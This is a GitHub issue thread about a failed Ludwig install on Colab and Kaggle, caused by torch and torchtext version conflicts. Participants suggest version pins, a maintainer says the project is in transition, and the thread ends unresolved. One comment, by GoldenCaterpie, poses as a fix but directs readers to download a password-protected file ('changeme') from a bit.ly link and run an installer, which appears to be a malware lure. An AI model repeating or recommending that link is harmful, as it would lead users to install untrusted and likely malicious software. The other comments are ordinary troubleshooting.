### ISSUE TITLE
Ludwig Installation Not Working

### ISSUE THREAD

**Issue by abedkhooli** [ludwig-ai/ludwig#4025]
Tried `!pip install ludwig[llm]` on both Colab and Kaggle. Then, could not import from the api: 
`from ludwig.api import LudwigModel` 
`[OSError: /opt/conda/lib/python3.10/site-packages/torchtext/lib/libtorchtext.so: undefined symbol: _ZN5torch6detail10class_baseC2ERKSsS3_SsRKSt9type_infoS6_](https://download.pytorch.org/models/text/%3C/span%3E%3Cspan)`  
Issue seems related to `torchtext' (0.18.0 gets installed). Tried with 0.17.0 and got 
```
AttributeError: module 'torch.library' has no attribute 'register_fake'
``` 
Basically, torch and related libraries issues.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by iterniter** [comment]
pip uninstall ludwig torch torchtext
pip install torch==2.0.1 torchtext==0.15.2

**Comment by abedkhooli** [comment]
@iterniter Did you test it on Colab? Do you mean w/out ludwig in first line? 
Still error with `torch._custom_ops` missing.

**Comment by amansinghlegitt3110** [comment]
is this issue resolved i am still getting it on collab

**Comment by amansinghlegitt3110** [comment]
> Tried `!pip install ludwig[llm]` on both Colab and Kaggle. Then, could not import from the api: `from ludwig.api import LudwigModel` `[OSError: /opt/conda/lib/python3.10/site-packages/torchtext/lib/libtorchtext.so: undefined symbol: _ZN5torch6detail10class_baseC2ERKSsS3_SsRKSt9type_infoS6_](https://download.pytorch.org/models/text/%3C/span%3E%3Cspan)` Issue seems related to `torchtext' (0.18.0 gets installed). Tried with 0.17.0 and got
> 
> ```
> AttributeError: module 'torch.library' has no attribute 'register_fake'
> ```
> 
> Basically, torch and related libraries issues.

have yo resolved this

**Comment by mhabedank** [comment]
Hi @amansinghlegitt3110 thanks for your report. Can you share the notebook on kaggle or colab?

We are currently undergoing an organizational transition with this project and Unfortunately, there was hardly any time to take care of the code base in the last few month. We hope that we will be able to resume work in the next few weeks.

**Comment by dexterslabs** [comment]
https://colab.research.google.com/github/ludwig-ai/ludwig-docs/blob/master/docs/examples/text_classification/Text_Classification_with_Ludwig_Python_API.ipynb#scrollTo=tZlU04uyDJhR

**Comment by mhabedank** [comment]
@ethanreidel @skanjila looks like it's related to the whole dependency topic. Furthermore torchtext development is stoped. Looks like we have to find an alternative somewhen.

**Comment by mhabedank** [comment]
@amansinghlegitt3110 could you please try to use torchtext 0.17.2? In our setup that worked.

**Comment by b1n1yam** [comment]
This is still not working on colab
